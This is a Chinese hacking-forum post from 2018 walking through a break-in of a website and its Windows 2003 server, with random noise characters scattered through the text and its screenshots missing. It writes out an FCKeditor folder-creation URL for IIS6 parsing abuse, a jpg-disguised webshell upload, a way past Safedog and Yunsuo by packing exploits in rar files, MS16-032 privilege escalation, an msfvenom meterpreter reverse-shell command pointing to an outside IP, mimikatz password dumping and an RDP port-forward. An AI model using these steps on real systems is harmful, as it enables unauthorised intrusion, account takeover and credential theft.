中国网络渗透测试联盟

标题: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器 [打印本页]

作者: admin    时间: 2018-10-20 20:31
标题: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

+ B( V* ]" F# s# n% L 8 Y5 e M0 e2 R+ B& a/ e9 s( d8 l( f! i' ] z9 s& S9 [3 J5 ~3 A! x$ X; v/ H8 N# ^8 u$ z- k, D$ |& S1 Z9 n* w# e" ~) D+ Q+ E9 Q9 j2 w% G2 |/ d6 \% b2 j( R, S* G
, s# |2 y/ w$ P6 `' S# f

$ P! p5 y2 H+ f! m3 S$ z- Z
. I) u* i2 p( I& ?7 x- Q
一、 利用getwebshell
0 M' |2 @5 [7 S' e
5 m0 G7 ]; E# j
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
% ]& p, D& g8 p9 ~# ^+ ~) H2 E
" V' I1 W3 @7 A7 V1 ]6 _ 222.png
. D3 j; r/ _$ J; A5 r" O+ q
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
9 B4 c2 c: Y# i6 v. S 333.png
9 v4 O' r1 X R: k
下面我们构造一个asp目录,如: , b( q4 V8 ?, |& V, C

! F" z7 k" T# B8 T3 c! K) h6 K

6 E+ t7 i$ @+ q) S' {' B http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 5 H2 [0 s3 f: J% V

# K+ T) L, w, O- g/ ^) l

4 X) b2 |1 g+ m6 `) p 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
Y1 c. g0 L5 K1 w! A
' m; E0 J2 g3 x6 C, R2 V
一、 绕过安全狗云锁提权并且加账号
* S& d2 e1 c& ]( v4 M, S 444.png
2 @3 r# ~) Q# p. K* b
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
6 y/ l6 u0 n0 O! {0 b6 f0 S, v; |& y
3 g5 Y( e. k6 q0 L {' ^- D: {
如图:
$ E# ^3 D) ^* D2 J$ n: f 555.png
. q x. O" e/ Y/ t
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
- Q% r3 p X0 K0 d5 h
0 N# [: i- E1 |8 N
一、 利用metasploit
' x4 P3 Y6 K) W" n6 Y9 P3 ?
, P' g; N: a* G2 g: t- a- r% @
首先用pentestbox生成一个64位的payload如下命令
* A T& X W. {/ o' T! g
' ~% F* w; V& W) n8 z msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
, p9 D- I4 \( F' [0 U
z$ O' e2 o" P6 u6 V4 d' E4 H
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 x" b0 L% U- U* {5 N' }11.png
! l" c: _: b7 j' N, ?
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
6 @9 \* F8 J9 f( }13.png
0 c( a! D( d8 T: g- D
下面我们来做一个监听如下命令:
$ \6 {6 O" e& A3 i% D8 H- K3 J
* C2 d' v# B; v0 [ b# U- n, ?portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
4 Z& w) L8 y! D p2 ~18.png
, V! ` I% i! S! V4 v, _

* U9 k0 A* M% b& s8 V1 u! l
" _. N1 X+ {% w" Q# w( n- M

/ x6 Z6 K7 Q/ |2 Q3 {0 m

" f) x$ }# V* _) n% ]* r
# [* A+ ?. M! q4 V) \3 N. s0 W0 ^
6 o* ^/ \# v ?( S+ W: f! H
5 U% X% b# h# Y

6 k0 m2 S* X' P3 s: Y E
( s# u' s6 M# z/ @3 [+ o9 `) e 3 o" L% ^" O! J8 e: [' T+ F5 Y

/ z1 A6 r5 [3 n M( @) Y1 z0 @
3 j8 ^0 |$ o; x) J# O- C" X


作者: 匿名    时间: 2021-11-20 23:30
图片怎么都没了




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2